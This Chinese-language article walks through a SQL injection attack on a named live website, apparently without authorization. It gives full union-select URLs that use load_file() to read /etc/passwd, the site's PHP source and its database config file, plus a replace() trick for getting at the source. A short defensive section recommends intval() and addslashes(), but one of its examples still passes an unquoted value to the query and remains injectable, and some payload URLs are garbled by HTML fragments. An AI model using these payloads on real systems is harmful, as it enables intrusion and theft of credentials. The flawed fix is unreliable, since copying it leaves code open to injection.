php注入技巧

 

作者:cnbird     來源：http://www.juntuan.net/

首先感謝軍團給了我這麼好的環境，能夠讓我自己寫一些原創的文章.

起因:
　聽承諾說ＣＡＳＩ出２.0了，而且承諾也給了一個有漏洞的地址，正好沒事就測試了一下，最近非常鬱悶，學不下去，正好今天承諾勾起了我學習php的美好時光，看看自己還能不能搞這樣的站吧.

過程：
承諾給的地址是http://www.gametea.com//showboard.php?id=282
很標準的php注入形式，我們也按照標準的php注入方法來進行注入，首先再後面加一個',

http://www.gametea.com/showboard.php?id=282' 

１

他告訴我們２個方面的資訊，第一是magic_quotes_gpc = off
第二個就是web路徑/home/newgt/showboard.php

再提交語句以前我們還是先來說明一下php注入的原理和一個小例子，php注入就是利用變數過濾不足造成的

看看下面兩句SQL語句：

①SELECT * FROM article WHERE articleid='$id' ②SELECT * FROM article WHERE articleid=$id

　　兩種寫法在各種程式中都很普遍，但安全性是不同的，第一句由於把變數$id放在一對單引號中，這樣使得我們所提交的變數都變成了字串，即使包含了正確的SQL語句，也不會正常執行，而第二句不同，由於沒有把變數放進單引號中，那我們所提交的一切，只要包含空格，那空格後的變數都會作為SQL語句執行，我們針對兩個句子分別提交兩個成功注入的畸形語句，來看看不同之處。

① 指定變數$id為： 1' and 1=2 union select * from user where userid=1/* 此時整個SQL語句變為： SELECT * FROM article WHERE articleid='1' and 1=2 union select * from user where userid=1/*' ②指定變數$id為： 1 and 1=2 union select * from user where userid=1 此時整個SQL語句變為： SELECT * FROM article WHERE articleid=1 and 1=2 union select * from user where userid=1

　　看出來了嗎？由於第一句有單引號，我們必須先閉合前面的單引號，這樣才能使後面的語句作為SQL執行，並要注釋掉後面原SQL語句中的後面的單引號，這樣才可以成功注入，如果php.ini中magic_quotes_gpc設定為on或者變數前使用了addslashes()函數，我們的攻擊就會化為烏有，但第二句沒有用引號包含變數，那我們也不用考慮去閉合、注釋，直接提交就OK了。

好了現在我們就要按照angel的方法來提交語句了http://www.gametea.com/showboard.php?id=282%20and%201=2%20union%20select%2050,9,8,7,6,5,4,3,2,1

２

再這裡我們可以得知７和９這兩個地方是文本的，也就是說可以顯示我們想要的檔案的內容,下面我們就是要讀取伺服器上的檔案了從web路徑上看這台機器應該是ＵＮＩＸ的，那麼我們的目標就是拿到/etc/passwd這個檔案了

我們知道，在SQL語句中，可以使用各種MySQL內建的函數，經常使用的就是DATABASE()、USER()、SYSTEM_USER()、SESSION_USER()、CURRENT_USER()這些函數來擷取一些系統的資訊，還有一個應用得比較多的函數，就是load_file()，該函數的作用是讀入檔案，並將檔案內容作為一個字串返回。
　　看到這裡，應該可以想到我們可以做什麼了，就是讀取一些機密檔案，但是也是有條件限制的：

• 欲讀取檔案必須在伺服器上
• 必須指定檔案完整的路徑
• 必須有許可權讀取並且檔案必須完全可讀
• 欲讀取檔案必須小於 max_allowed_packet

　　如果該檔案不存在，或因為上面的任一原因而不能被讀出，函數返回空。比較難滿足的就是許可權，在windows下，如果NTFS設定得當，是不能讀取相關的檔案的，當遇到只有administrators才能訪問的檔案，users就別想load_file出來。

　　在實際的注入中，我們有兩個痛點需要解決：

• 絕對實體路徑
• 構造有效畸形語句

　　在很多PHP程式中，當提交一個錯誤的Query，如果display_errors = on，程式就會暴露WEB目錄的絕對路徑，只要知道路徑，那麼對於一個可以注入的PHP程式來說，整個伺服器的安全將受到嚴重的威脅。構造語句已經是小意思了。

我們這裡用的load_file(char())這個函數我們需要把/etc/passwd轉化成１６進位的我們請出asc2chr這個工具來幫我們完成轉化工作

三

我們很輕鬆的就得到了/etc/passwd的１６進位格式

下面就是構建語句了_file(char(47,101,116,99,47,112,97,115,115,119,100)),6,5,4,3,2,1">http://www.gametea.com/showboard.php?id=282%20and%201=2%20union%20select%2050,9,8,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),6,5,4,3,2,1   

 很輕鬆就得到了/etc/passwd的檔案，大家看一片，

４

下面我們就要想辦法來讀取config的設定檔了，因為前面我們得到了web的路徑所以讀取就很輕鬆了

構建語句_file(char(47,104,111,109,101,47,110,101,119,103,116,47,115,104,111,119,98,111,97,114,100,46,112,104,112)),6,5,4,3,2,1">http://www.gametea.com//showboard.php?id=282%20and%201=2%20union%20select%2050,9,8,load_file(char(47,104,111,109,101,47,110,101,119,103,116,47,115,104,111,119,98,111,97,114,100,46,112,104,112)),6,5,4,3,2,1 

五
 

可是和我們想的不一樣，並沒有得到php原始碼，原來php的代碼再伺服器端執行了，這個時候我們可以用angel的辦法利用into　outfile來把要讀取的檔案備份到伺服器上，可是我沒有這樣做，因為我不想局限於別人的思路我認為mysql一定有強大的函數能協助我們的,記得以前學習php的時候學字串函數的時候學到了這樣一個函數就是replace()他的作用就是把指定的字串換成我們想要的字串，我覺得一定能夠利用,

附:replace()函數原形

REPLACE(str,from_str,to_str)返回字串str，其字串from-str的所有出現有字串to-str代替

mysql>SELECT REPLACE('www.mysql.com','w','Ww');

->'WwWwWw.mysql.com'

到這裡我就想了php原始碼的固定形式是這樣的，<?php ?>

那麼我們如果打破規則，把<?php ?> 中的<變成別的字元那麼就應該能夠顯示了吧，按照這個思路我夠建語句如下

_file(char(47,104,111,109,101,47,110,101,119,103,116,47,115,104,111,119,98,111,97,114,100,46,112,104,112)),char(60),char(32)),6,5,4,3,2,1">http://www.gametea.com//showboard.php?id=282%20and%201=2%20union%20select%2050,9,8,replace(load_file(char(47,104,111,109,101,47,110,101,119,103,116,47,115,104,111,119,98,111,97,114,100,46,112,104,112)),char(60),char(32)),6,5,4,3,2,1

char(60) 是<,char(32)是空格,

他的意思就是把換成空格，我們已經成功了，大家看圖，
６

好了到這裡我們的目的就是讀取config的檔案了他的config檔案是/home/newgt/localdata.php,

夠建語句如下

_file(char(47,104,111,109,101,47,110,101,119,103,116,47,108,111,99,97,108,100,97,116,97,46,112,104,112)),char(60),char(32)),6,5,4,3,2,1">http://www.gametea.com/showboard.php?id=282%20and%201=2%20union%20select%2050,9,8,replace(load_file(char(47,104,111,109,101,47,110,101,119,103,116,47,108,111,99,97,108,100,97,116,97,46,112,104,112)),char(60),char(32)),6,5,4,3,2,1 

  ７我們就已經得到了config的檔案了,

７

到這裡我們的思路就應該清楚了，我就不在往下做了，如果大家感興趣的話可以參考我以前的文章來繼續滲透，

這裡我們已經能夠清楚的看到一個小小的注入漏洞就能引出這麼大的漏洞，希望國內的人重視起來,下面是解決辦法防範可以從兩個方面著手，一個就是伺服器，二個就是代碼本身，介紹伺服器配置的文章很多了，無非就是把magic_quotes_gpc設定為On，display_errors設定為Off，這裡也就不在多說，既然本文接觸都是程式的問題，我們還是從程式本身尋找原因。
　　如果說php比asp易用，安全，從內建的函數就可以體現出來。如果是整形的變數，只需使用一個intval()函數即可解決問題，在執行查詢之前，我們先處理一下變數，如下面的例子就是很安全的了：

$id = intval($id); mysql_query("SELECT * FROM article WHERE articleid='$id'");

　　或者這樣寫：

mysql_query("SELECT * FROM article WHERE articleid=".intval($id)."")

　　不管如何構造，最終還是會先轉換為整形猜放入資料庫的。很多大型程式都是這樣寫，非常簡潔。
　　字串形的變數也可以用addslashes()整個內建函數了，這個函數的作用和magic_quotes_gpc一樣，使用後，所有的 ' (單引號), " (雙引號), / (反斜線) and Null 字元會自動轉為含有反斜線的溢出字元。而且新版本的php，就算magic_quotes_gpc開啟了，再使用addslashes()函數，也不會有衝突，可以放心使用。例子如下：

$username = addslashes($username); mysql_query("SELECT * FROM members WHERE userid='$username'");

　　或者這樣寫：

mysql_query("SELECT * FROM members WHERE userid=".addslashes($username)."")

　　使用addslashes()函數還可以避免引號配對錯誤的情況出現。而剛才的前面搜尋引擎的修補方法就是直接把“_”、“%”轉換為“/_”“/%”就可以了，當然也不要忘記使用addslashes()函數。具體代碼如下：

$keywords = addslashes($keywords); $keywords = str_replace("_","/_",$keywords); $keywords = str_replace("%","/%",$keywords);

好了，這篇文章就寫到這裡

參考文獻：SQL Injection with MySQL
http://www.4ngel.net/article/36.htm
Advanced SQL Injection with MySQL
http://www.4ngel.net/article/30.htm